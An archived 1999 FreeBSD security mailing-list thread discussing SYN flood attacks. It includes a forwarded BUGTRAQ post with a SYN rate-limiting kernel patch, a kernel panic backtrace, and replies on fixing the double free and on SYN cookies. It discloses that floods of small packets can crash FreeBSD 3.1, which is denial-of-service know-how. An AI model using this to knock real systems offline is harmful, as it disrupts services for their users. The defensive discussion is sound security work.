MULTIPART/Mixed; BOUNDARY="Boundary_(ID_Gb/ZMISfT+tnDS1nELJmmQ)" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --Boundary_(ID_Gb/ZMISfT+tnDS1nELJmmQ) Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Don't know whether this hit the list yet, so I'm passing along. Apologies if it's old news. Note: I am not the author of the message; I'm just reposting it here. Please remove my address from any replies to the -stable mailing list. Thanks. SB ---------- Forwarded message ---------- Date: Thu, 13 May 1999 11:35:43 -0700 From: Richard Steenbergen To: BUGTRAQ@netspace.org Subject: SYN floods against FreeBSD Here's a quickie for the people who have been plagued with high bandwidth syn flood attacks, a kernel patch for FreeBSD 3.1-STABLE which rate limits SYN processing. Its messy but functional and I don't have time to make it better (thats the fbsd developers job, not mine :P), cd /usr/src/sys, patch < synlim, add "options SYN_RATELIM" (I highly recommend ICMP_BANDLIM as well) to your kernel, recompile, and sysctl net.inet.tcp.synlim will be available (default to 100). This is the maximium number of SYNs per second that will be processed, the rest will be silently discarded. On my test system (P2 450 running 3.1-stable being hit w/15,000 packets per sec), this has successfully brought CPU usage from 100% to ~20% (against an open port which is replying with unacknowledged ACKs). Which brings us to the more sticky topic of kernel panics when under SYN flood (which I believe to be the cause of some earlier posts from certain people at Exodus Communications *cough*). Lord knows I found enough of them when doing this testing, but the one that seems to be the biggie for crashing when under syn flood is as follows (heh just turned off the synlim and panic'd within 8 seconds while writing this): panic: free: multiple frees (kgdb) bt #0 boot (howto=256) at ../../kern/kern_shutdown.c:285 #1 0xc0138c09 in panic (fmt=0xc02192b7 "free: multiple frees") at ../../kern/kern_shutdown.c:446 #2 0xc0135aaf in free (addr=0xc0cdd600, type=0xc0239330) at ../../kern/kern_malloc.c:333 #3 0xc01768f4 in ifafree (ifa=0xc0cdd600) at ../../net/route.c:262 #4 0xc0176876 in rtfree (rt=0xc34ce700) at ../../net/route.c:236 #5 0xc0176c84 in rtrequest (req=2, dst=0xc34cbac0, gateway=0xc34cbad0, netmask=0x0, flags=393223, ret_nrt=0x0) at ../../net/route.c:536 #6 0xc017b34d in in_rtqkill (rn=0xc34ce700, rock=0xc0231610) at ../../netinet/in_rmx.c:242 #7 0xc0176064 in rn_walktree (h=0xc0cd9e00, f=0xc017b2fc , w=0xc0231610) at ../../net/radix.c:956 #8 0xc017b3ec in in_rtqtimo (rock=0xc0cd9e00) at ../../netinet/in_rmx.c:283 #9 0xc013d19b in softclock () at ../../kern/kern_timeout.c:124 Which after a quick examination seems to be a perioditic routing table cleanup. It seems that in_rtqtimo is scheduled to run every net.inet.ip.rtexpire seconds (which is dynamicly adjusted and can never go lower then net.inet.ip.rtminexpire). When the system is under heavy load from processing lots of small packets (they don't even have to be SYNs, anything which can get routed will do the trick, though the packet kiddies would get very little gain from just sending an ip header since its going to be padded to 64 bytes for the eth frame anyhow), this route cleanup code will go wacking at routes it shouldn't and free some memory twice. In the course of testing I've gotten my rtq_reallyold to -3 and seen lots of "tvotohz: negative time difference -2 sec 0 usec". Perhaps someone with free time or more specific knowledge of this area would like to FIX IT? =) Perhaps when I get more free time I'll test some other *nix's. I would really recommend putting all this rate limiting code at an ipfw level. If you would like to contact me regarding this please use humble@quadrunner.com (at least if you want a quick reply), thanks. -- Richard Steenbergen humble@EFNet PGP ID: 0x741D0374 PGP Key Fingerprint: C6EF EFA0 83B2 071F 1AB6 B879 1F70 4303 741D 0374 http://users.quadrunner.com/humble --Boundary_(ID_Gb/ZMISfT+tnDS1nELJmmQ) Content-Type: TEXT/PLAIN; NAME=synlim; CHARSET=US-ASCII Content-ID: Content-Description: SYN rate limit patch for fbsd 3.1 Content-Disposition: ATTACHMENT; FILENAME=synlim *** conf/options.old Sat May 15 23:08:03 1999 --- conf/options Sat May 15 23:40:21 1999 *************** *** 68,73 **** --- 68,74 ---- SYSVSHM opt_sysvipc.h UCONSOLE ICMP_BANDLIM + SYN_RATELIM # POSIX kernel options P1003_1B opt_posix.h *** netinet/tcp_var.h.old Sat May 15 23:25:39 1999 --- netinet/tcp_var.h Sat May 15 23:45:05 1999 *************** *** 40,45 **** --- 40,49 ---- * Kernel variables for tcp. */ + #ifdef KERNEL + #include "opt_syn_ratelim.h" + #endif + /* * Tcp control block, one per tcp; fields: * Organized for 16 byte cacheline efficiency. *************** *** 305,311 **** #define TCPCTL_RECVSPACE 9 /* receive buffer space */ #define TCPCTL_KEEPINIT 10 /* receive buffer space */ #define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */ ! #define TCPCTL_MAXID 12 #define TCPCTL_NAMES { \ { 0, 0 }, \ --- 309,316 ---- #define TCPCTL_RECVSPACE 9 /* receive buffer space */ #define TCPCTL_KEEPINIT 10 /* receive buffer space */ #define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */ ! #define TCPCTL_SYNLIM 12 /* Rate limiting of SYNs */ ! #define TCPCTL_MAXID 13 #define TCPCTL_NAMES { \ { 0, 0 }, \ *************** *** 320,325 **** --- 325,331 ---- { "recvspace", CTLTYPE_INT }, \ { "keepinit", CTLTYPE_INT }, \ { "pcblist", CTLTYPE_STRUCT }, \ + { "synlim", CTLTYPE_INT }, \ } #ifdef KERNEL *** netinet/tcp_input.c.old Sat May 15 23:08:10 1999 --- netinet/tcp_input.c Sun May 16 01:33:51 1999 *************** *** 72,77 **** --- 72,85 ---- static struct tcpiphdr tcp_saveti; #endif + #ifdef SYN_RATELIM + static int synlim = 100; + SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RW, &synlim, 0, ""); + #else + static int synlim = -1; + SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RD, &synlim, 0, ""); + #endif + static int tcprexmtthresh = 3; tcp_seq tcp_iss; tcp_cc tcp_ccgen; *************** *** 98,104 **** struct tcpiphdr *, struct mbuf *)); static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); static void tcp_xmit_timer __P((struct tcpcb *, int)); ! /* * Insert segment ti into reassembly queue of tcp with --- 106,112 ---- struct tcpiphdr *, struct mbuf *)); static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); static void tcp_xmit_timer __P((struct tcpcb *, int)); ! static int syn_ratelim(void); /* * Insert segment ti into reassembly queue of tcp with *************** *** 130,135 **** --- 138,183 ---- } \ } + #ifdef SYN_RATELIM + int syn_ratelim(void) + { + static int lticks; + static int lpackets; + int dticks; + + /* + * Return ok status if feature disabled or argument out of + * ranage. + */ + + if (synlim <= 0) + return(0); + + dticks = ticks - lticks; + + /* + * reset stats when cumulative dt exceeds one second. + */ + + if ((unsigned int)dticks > hz) { + if (lpackets > synlim) + printf("syn rate limit reached %d/%d pps\n", lpackets, synlim); + lticks = ticks; + lpackets = 0; + } + + /* + * bump packet count + */ + + if (++lpackets > synlim) { + return(-1); + } + + return(0); + } + #endif + static int tcp_reass(tp, ti, m) register struct tcpcb *tp; *************** *** 379,384 **** --- 427,438 ---- ip_fw_fwd_addr = NULL; } else #endif /* IPFIREWALL_FORWARD */ + + #ifdef SYN_RATELIM + if ((tiflags & TH_SYN) && !(tiflags & TH_ACK)) + if (syn_ratelim() < 0) + goto drop; + #endif inp = in_pcblookup_hash(&tcbinfo, ti->ti_src, ti->ti_sport, ti->ti_dst, ti->ti_dport, 1); --Boundary_(ID_Gb/ZMISfT+tnDS1nELJmmQ)-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 14 12:57:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 8A1CE14F31; Fri, 14 May 1999 12:57:31 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id MAA03794; Fri, 14 May 1999 12:57:31 -0700 (PDT) (envelope-from dillon) Date: Fri, 14 May 1999 12:57:31 -0700 (PDT) From: Matthew Dillon Message-Id: <199905141957.MAA03794@apollo.backplane.com> To: freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: SYN floods against FreeBSD (fwd) References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :Don't know whether this hit the list yet, so I'm passing along. Apologies :if it's old news. : :Note: I am not the author of the message; I'm just reposting it here. :Please remove my address from any replies to the -stable mailing list. :Thanks. : :SB Addressing the bugtrack posting and not the messenger :-) I think this patch is a bad idea. I recall fixing a bug in the route table code that could cause a double-free panic, but I do not remember if it was before or after the 3.1 release. In anycase, a double-free panic has nothing to do with a high volume of SYN traffic apart from ticking some new bug. The appropriate fix is *not* to try to limit the sync traffic but instead to track down, locate, and fix the double-free. I will go over the route table code to see if the softclock interrupt is being properly masked while the route table is being manipulated. -Matt :---------- Forwarded message ---------- :Date: Thu, 13 May 1999 11:35:43 -0700 :From: Richard Steenbergen :To: BUGTRAQ@netspace.org :Subject: SYN floods against FreeBSD : :Here's a quickie for the people who have been plagued with high bandwidth :syn flood attacks, a kernel patch for FreeBSD 3.1-STABLE which rate limits :SYN processing. Its messy but functional and I don't have time to make it :better (thats the fbsd developers job, not mine :P), cd /usr/src/sys, :patch < synlim, add "options SYN_RATELIM" (I highly recommend ICMP_BANDLIM :as well) to your kernel, recompile, and sysctl net.inet.tcp.synlim will be :available (default to 100). This is the maximium number of SYNs per second :that will be processed, the rest will be silently discarded. On my test :system (P2 450 running 3.1-stable being hit w/15,000 packets per sec), :this has successfully brought CPU usage from 100% to ~20% (against an open :port which is replying with unacknowledged ACKs). : :Which brings us to the more sticky topic of kernel panics when under SYN :flood (which I believe to be the cause of some earlier posts from certain :people at Exodus Communications *cough*). Lord knows I found enough of :them when doing this testing, but the one that seems to be the biggie for :crashing when under syn flood is as follows (heh just turned off the :synlim and panic'd within 8 seconds while writing this): : :panic: free: multiple frees :(kgdb) bt :#0 boot (howto=256) at ../../kern/kern_shutdown.c:285 :#1 0xc0138c09 in panic (fmt=0xc02192b7 "free: multiple frees") : at ../../kern/kern_shutdown.c:446 :#2 0xc0135aaf in free (addr=0xc0cdd600, type=0xc0239330) : at ../../kern/kern_malloc.c:333 :#3 0xc01768f4 in ifafree (ifa=0xc0cdd600) at ../../net/route.c:262 :#4 0xc0176876 in rtfree (rt=0xc34ce700) at ../../net/route.c:236 :#5 0xc0176c84 in rtrequest (req=2, dst=0xc34cbac0, gateway=0xc34cbad0, : netmask=0x0, flags=393223, ret_nrt=0x0) at ../../net/route.c:536 :#6 0xc017b34d in in_rtqkill (rn=0xc34ce700, rock=0xc0231610) : at ../../netinet/in_rmx.c:242 :#7 0xc0176064 in rn_walktree (h=0xc0cd9e00, f=0xc017b2fc , : w=0xc0231610) at ../../net/radix.c:956 :#8 0xc017b3ec in in_rtqtimo (rock=0xc0cd9e00) at ../../netinet/in_rmx.c:283 :#9 0xc013d19b in softclock () at ../../kern/kern_timeout.c:124 : :Which after a quick examination seems to be a perioditic routing table :cleanup. It seems that in_rtqtimo is scheduled to run every :net.inet.ip.rtexpire seconds (which is dynamicly adjusted and can never go :lower then net.inet.ip.rtminexpire). When the system is under heavy load :from processing lots of small packets (they don't even have to be SYNs, :anything which can get routed will do the trick, though the packet kiddies :would get very little gain from just sending an ip header since its going :to be padded to 64 bytes for the eth frame anyhow), this route cleanup :code will go wacking at routes it shouldn't and free some memory twice. In :the course of testing I've gotten my rtq_reallyold to -3 and seen lots of :"tvotohz: negative time difference -2 sec 0 usec". Perhaps someone with :free time or more specific knowledge of this area would like to FIX IT? =) : :Perhaps when I get more free time I'll test some other *nix's. I would :really recommend putting all this rate limiting code at an ipfw level. : :If you would like to contact me regarding this please use :humble@quadrunner.com (at least if you want a quick reply), thanks. : :-- :Richard Steenbergen humble@EFNet PGP ID: 0x741D0374 :PGP Key Fingerprint: C6EF EFA0 83B2 071F 1AB6 B879 1F70 4303 741D 0374 :http://users.quadrunner.com/humble : :--Boundary_(ID_Gb/ZMISfT+tnDS1nELJmmQ) :Content-Type: TEXT/PLAIN; NAME=synlim; CHARSET=US-ASCII :Content-ID: :Content-Description: SYN rate limit patch for fbsd 3.1 :Content-Disposition: ATTACHMENT; FILENAME=synlim : :*** conf/options.old Sat May 15 23:08:03 1999 :--- conf/options Sat May 15 23:40:21 1999 :*************** :*** 68,73 **** :--- 68,74 ---- : SYSVSHM opt_sysvipc.h : UCONSOLE : ICMP_BANDLIM :+ SYN_RATELIM : : # POSIX kernel options : P1003_1B opt_posix.h :*** netinet/tcp_var.h.old Sat May 15 23:25:39 1999 :--- netinet/tcp_var.h Sat May 15 23:45:05 1999 :*************** :*** 40,45 **** :--- 40,49 ---- : * Kernel variables for tcp. : */ : :+ #ifdef KERNEL :+ #include "opt_syn_ratelim.h" :+ #endif :+ : /* : * Tcp control block, one per tcp; fields: : * Organized for 16 byte cacheline efficiency. :*************** :*** 305,311 **** : #define TCPCTL_RECVSPACE 9 /* receive buffer space */ : #define TCPCTL_KEEPINIT 10 /* receive buffer space */ : #define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */ :! #define TCPCTL_MAXID 12 : : #define TCPCTL_NAMES { \ : { 0, 0 }, \ :--- 309,316 ---- : #define TCPCTL_RECVSPACE 9 /* receive buffer space */ : #define TCPCTL_KEEPINIT 10 /* receive buffer space */ : #define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */ :! #define TCPCTL_SYNLIM 12 /* Rate limiting of SYNs */ :! #define TCPCTL_MAXID 13 : : #define TCPCTL_NAMES { \ : { 0, 0 }, \ :*************** :*** 320,325 **** :--- 325,331 ---- : { "recvspace", CTLTYPE_INT }, \ : { "keepinit", CTLTYPE_INT }, \ : { "pcblist", CTLTYPE_STRUCT }, \ :+ { "synlim", CTLTYPE_INT }, \ : } : : #ifdef KERNEL :*** netinet/tcp_input.c.old Sat May 15 23:08:10 1999 :--- netinet/tcp_input.c Sun May 16 01:33:51 1999 :*************** :*** 72,77 **** :--- 72,85 ---- : static struct tcpiphdr tcp_saveti; : #endif : :+ #ifdef SYN_RATELIM :+ static int synlim = 100; :+ SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RW, &synlim, 0, ""); :+ #else :+ static int synlim = -1; :+ SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RD, &synlim, 0, ""); :+ #endif :+ : static int tcprexmtthresh = 3; : tcp_seq tcp_iss; : tcp_cc tcp_ccgen; :*************** :*** 98,104 **** : struct tcpiphdr *, struct mbuf *)); : static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); : static void tcp_xmit_timer __P((struct tcpcb *, int)); :! : : /* : * Insert segment ti into reassembly queue of tcp with :--- 106,112 ---- : struct tcpiphdr *, struct mbuf *)); : static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); : static void tcp_xmit_timer __P((struct tcpcb *, int)); :! static int syn_ratelim(void); : : /* : * Insert segment ti into reassembly queue of tcp with :*************** :*** 130,135 **** :--- 138,183 ---- : } \ : } : :+ #ifdef SYN_RATELIM :+ int syn_ratelim(void) :+ { :+ static int lticks; :+ static int lpackets; :+ int dticks; :+ :+ /* :+ * Return ok status if feature disabled or argument out of :+ * ranage. :+ */ :+ :+ if (synlim <= 0) :+ return(0); :+ :+ dticks = ticks - lticks; :+ :+ /* :+ * reset stats when cumulative dt exceeds one second. :+ */ :+ :+ if ((unsigned int)dticks > hz) { :+ if (lpackets > synlim) :+ printf("syn rate limit reached %d/%d pps\n", lpackets, synlim); :+ lticks = ticks; :+ lpackets = 0; :+ } :+ :+ /* :+ * bump packet count :+ */ :+ :+ if (++lpackets > synlim) { :+ return(-1); :+ } :+ :+ return(0); :+ } :+ #endif :+ : static int : tcp_reass(tp, ti, m) : register struct tcpcb *tp; :*************** :*** 379,384 **** :--- 427,438 ---- : ip_fw_fwd_addr = NULL; : } else : #endif /* IPFIREWALL_FORWARD */ :+ :+ #ifdef SYN_RATELIM :+ if ((tiflags & TH_SYN) && !(tiflags & TH_ACK)) :+ if (syn_ratelim() < 0) :+ goto drop; :+ #endif : : inp = in_pcblookup_hash(&tcbinfo, ti->ti_src, ti->ti_sport, : ti->ti_dst, ti->ti_dport, 1); : :--Boundary_(ID_Gb/ZMISfT+tnDS1nELJmmQ)-- : : :To Unsubscribe: send mail to majordomo@FreeBSD.org :with "unsubscribe freebsd-security" in the body of the message : Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 14 13: 6:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 2481114E99 for ; Fri, 14 May 1999 13:06:45 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id OAA27906; Fri, 14 May 1999 14:05:58 -0600 (MDT) Message-Id: <4.2.0.37.19990514133829.0461e220@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Fri, 14 May 1999 14:05:51 -0600 To: Harold Gutch , Matthew Dillon From: Brett Glass Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD Cc: Jared Mauch , Thamer Al-Herbish , security@FreeBSD.ORG In-Reply-To: <19990514072546.A20779@foobar.franken.de> References: <199905140438.VAA97604@apollo.backplane.com> <4.2.0.37.19990513161529.00c1e3f0@localhost> <4.2.0.37.19990513202450.0444fca0@localhost> <199905140438.VAA97604@apollo.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Any technique that requires the originator to receive your SYN-ACK and generate a specific response before you commit resources is acceptable. Heck, you don't even really need a cryptographically strong hash for this. Is Linux really doing one MD5 per SYN? If so, I can think of a few other techniques that would give us a speed advantage. We'd be able to beat them in the benchmarks while still providing good protection against SYN flooding. One question about "the Linux way of doing it" as described below. What happens if the secret just happens to be modified right after the SYN-ACK? Could be you'd drop a connection or two that was legitimate. Seems like you'd need to test against an old AND a new secret to avoid the race condition, especially in the presence of congestion. One more point. According to the original BUGTRAQ message, a cleanup routine is causing problems when the system is under heavy load. At first glance, this looks like a consistency problem; the code may be traversing a data structure that changes out from under it. We need to fix this regardless of how we handle SYN floods. --Brett At 07:25 AM 5/14/99 +0200, Harold Gutch wrote: >On Thu, May 13, 1999 at 09:38:16PM -0700, Matthew Dillon wrote: > > The only way to mitigate the SYN flooding problem on the host side is to > > greatly increase the size of the listen queue, but even this does not work > > too well. > > >What about the Linux way of doing it, that is by creating an >MD5-hash over the source- and destination IP and port and a >secret which is incremented say every minute and using the result >as a base for the own sequencenumber. > >You don't lose a socket before you get the third handshake >packet and you can verify the sequencenumber using MD5 again. > >I found this idea to be quite interesting when reading about it >the first time, and I currently don't see any negative side >effects from it. > >The FreeBSD approach (just discarding the oldest socket in >SYN_RCVD state when the backlog gets too high) works often enough >aswell, but might cause problems if the flooder sends you more >SYNs than your backlog can handle in a shorter timeframe than >your SYN|ACK needs for it's way back to somebody who tries to >establish a normal connection and his answer back to you takes. > >bye, > Harold > >-- > Sleep is an abstinence syndrome wich occurs due to lack of caffein. >Wed Mar 4 04:53:33 CET 1998 #unix, ircnet > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 14 13: 7:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 88137150F5 for ; Fri, 14 May 1999 13:07:49 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id OAA27946; Fri, 14 May 1999 14:07:31 -0600 (MDT) Message-Id: <4.2.0.37.19990514140618.046502a0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Fri, 14 May 1999 14:07:26 -0600 To: Don Lewis , Thamer Al-Herbish , security@FreeBSD.ORG From: Brett Glass Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD In-Reply-To: <199905140546.WAA06542@salsa.gv.tsc.tdk.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:46 PM 5/13/99 -0700, Don Lewis wrote: >One potential danger is that you can't totally block incoming connections >to vulnerable ports by filtering out incoming SYN packets. If an attacker >can guess what sequence number you would have sent in a SYN-ACK, he can >establish a connection by just sending the third packet in the initial >three-way handshake. This isn't especially easy to brute force because >the sequence space is a 32 bit number, but it's not totally unreasonable >either if the attacker is patient enough. The attacker may also be able >to make better guesses if he knows the details of the implementation he is >attacking. It can be made pretty tough to guess if one has a good entropy pool. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 14 13:18:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from gw.whitefang.com (calnet11-70.gtecablemodem.com [207.175.234.70]) by hub.freebsd.org (Postfix) with SMTP id 999B914D34 for ; Fri, 14 May 1999 13:18:27 -0700 (PDT) (envelope-from shadows@whitefang.com) Received: (qmail 6317 invoked from network); 14 May 1999 20:18:25 -0000 Received: from rage.whitefang.com (shadows@192.168.1.3) by gw.whitefang.com with SMTP; 14 May 1999 20:18:25 -0000 Date: Fri, 14 May 1999 13:17:26 -0700 (PDT) From: Thamer Al-Herbish To: security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD In-Reply-To: <4.2.0.37.19990514133829.0461e220@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 14 May 1999, Brett Glass wrote: > One question about "the Linux way of doing it" as described > below. What happens if the secret just happens to be modified > right after the SYN-ACK? Could be you'd drop a connection or > two that was legitimate. Seems like you'd need to test against > an old AND a new secret to avoid the race condition, especially > in the presence of congestion. There were a few "trade offs" with the implementation. I have a copy of the syn-cookies mailing list archive. Forgot where I originally got it from: http://www.whitefang.com/syn-cookies.txt Oh and here's the obligatory question: has anyone already attempted to write a cookie mechanism for fbsd? -- Thamer Al-Herbish PGP public key: shadows@whitefang.com http://www.whitefang.com/pgpkey.txt [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 14 13:51:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from foobar.franken.de (foobar.franken.de [194.94.249.81]) by hub.freebsd.org (Postfix) with ESMTP id B236E14EAD for ; Fri, 14 May 1999 13:51:15 -0700 (PDT) (envelope-from logix@foobar.franken.de) Received: (from logix@localhost) by foobar.franken.de (8.8.8/8.8.5) id WAA22501; Fri, 14 May 1999 22:50:01 +0200 (CEST) Message-ID: <19990514225001.A22317@foobar.franken.de> Date: Fri, 14 May 1999 22:50:01 +0200 From: Harold Gutch To: Brett Glass , Matthew Dillon Cc: Jared Mauch , Thamer Al-Herbish , security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD References: <199905140438.VAA97604@apollo.backplane.com> <4.2.0.37.19990513161529.00c1e3f0@localhost> <4.2.0.37.19990513202450.0444fca0@localhost> <199905140438.VAA97604@apollo.backplane.com> <19990514072546.A20779@foobar.franken.de> <4.2.0.37.19990514133829.0461e220@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <4.2.0.37.19990514133829.0461e220@localhost>; from Brett Glass on Fri, May 14, 1999 at 02:05:51PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 14, 1999 at 02:05:51PM -0600, Brett Glass wrote: > Any technique that requires the originator to receive your > SYN-ACK and generate a specific response before you commit > resources is acceptable. Heck, you don't even really need > a cryptographically strong hash for this. Is Linux really > doing one MD5 per SYN? If so, I can think of a few other > techniques that would give us a speed advantage. We'd be > able to beat them in the benchmarks while still providing > good protection against SYN flooding. > Ah, that's a very good point, I never thought of the speed-question. > One question about "the Linux way of doing it" as described > below. What happens if the secret just happens to be modified > right after the SYN-ACK? Could be you'd drop a connection or > two that was legitimate. Seems like you'd need to test against > an old AND a new secret to avoid the race condition, especially > in the presence of congestion. > Yes, I'd guess so - I haven't had a look at the code itself, so I don't know wether this is actually done, but I'd guess so. > One more point. According to the original BUGTRAQ message, > a cleanup routine is causing problems when the system is > under heavy load. At first glance, this looks like a > consistency problem; the code may be traversing a data structure > that changes out from under it. We need to fix this regardless > of how we handle SYN floods. > This is certainly true, I have no idea why the subject of this thread changed to "How to handle SYN floods" this quickly. I just happen to have read the Linux mailinglist-archives about "their" way to handly SYN-floods only a few weeks ago, found it fairly interesting, so I wondered if there were any actual negative points about it. But you are right - back to the original topic. I checked my 2.2.8 boxes and flooded them with 1 Million SYN packets taking about 1 minute, so that's (roughly) 16000 SYNs per second. I did not manage to kill them with this. bye, Harold -- Sleep is an abstinence syndrome wich occurs due to lack of caffein. Wed Mar 4 04:53:33 CET 1998 #unix, ircnet To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 14 13:57:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from foobar.franken.de (foobar.franken.de [194.94.249.81]) by hub.freebsd.org (Postfix) with ESMTP id 617C914EAD for ; Fri, 14 May 1999 13:57:37 -0700 (PDT) (envelope-from logix@foobar.franken.de) Received: (from logix@localhost) by foobar.franken.de (8.8.8/8.8.5) id WAA22522; Fri, 14 May 1999 22:57:27 +0200 (CEST) Message-ID: <19990514225726.B22317@foobar.franken.de> Date: Fri, 14 May 1999 22:57:26 +0200 From: Harold Gutch To: Thamer Al-Herbish , security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD References: <4.2.0.37.19990514133829.0461e220@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Thamer Al-Herbish on Fri, May 14, 1999 at 01:17:26PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 14, 1999 at 01:17:26PM -0700, Thamer Al-Herbish wrote: > On Fri, 14 May 1999, Brett Glass wrote: > > > One question about "the Linux way of doing it" as described > > below. What happens if the secret just happens to be modified > > right after the SYN-ACK? Could be you'd drop a connection or > > two that was legitimate. Seems like you'd need to test against > > an old AND a new secret to avoid the race condition, especially > > in the presence of congestion. > > There were a few "trade offs" with the implementation. I have a copy > of the syn-cookies mailing list archive. Forgot where I originally > got it from: > > http://www.whitefang.com/syn-cookies.txt > I had a look at the archives a few weeks back, just having a quick look at most of the mails. I guess I must have missed those trade offs when reading it not too precisely - I'll check them again. > Oh and here's the obligatory question: has anyone already attempted > to write a cookie mechanism for fbsd? > I considered doing to, but seeing that FreeBSD already takes an (arguable) approach against SYN-floods stopped even thinking of something like that pretty quickly. FreeBSD basically drops sockets in SYN_RCVD state if too many of them are open and another SYN-packet arrives, making place for this new socket. bye, Harold -- Sleep is an abstinence syndrome wich occurs due to lack of caffein. Wed Mar 4 04:53:33 CET 1998 #unix, ircnet To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 14 14:59:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 7FEBF151EB for ; Fri, 14 May 1999 14:59:09 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id PAA28917; Fri, 14 May 1999 15:58:30 -0600 (MDT) Message-Id: <4.2.0.37.19990514154319.04610b80@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Fri, 14 May 1999 15:46:19 -0600 To: Harold Gutch , Matthew Dillon From: Brett Glass Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD Cc: Jared Mauch , Thamer Al-Herbish , security@FreeBSD.ORG In-Reply-To: <19990514225001.A22317@foobar.franken.de> References: <4.2.0.37.19990514133829.0461e220@localhost> <199905140438.VAA97604@apollo.backplane.com> <4.2.0.37.19990513161529.00c1e3f0@localhost> <4.2.0.37.19990513202450.0444fca0@localhost> <199905140438.VAA97604@apollo.backplane.com> <19990514072546.A20779@foobar.franken.de> <4.2.0.37.19990514133829.0461e220@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG 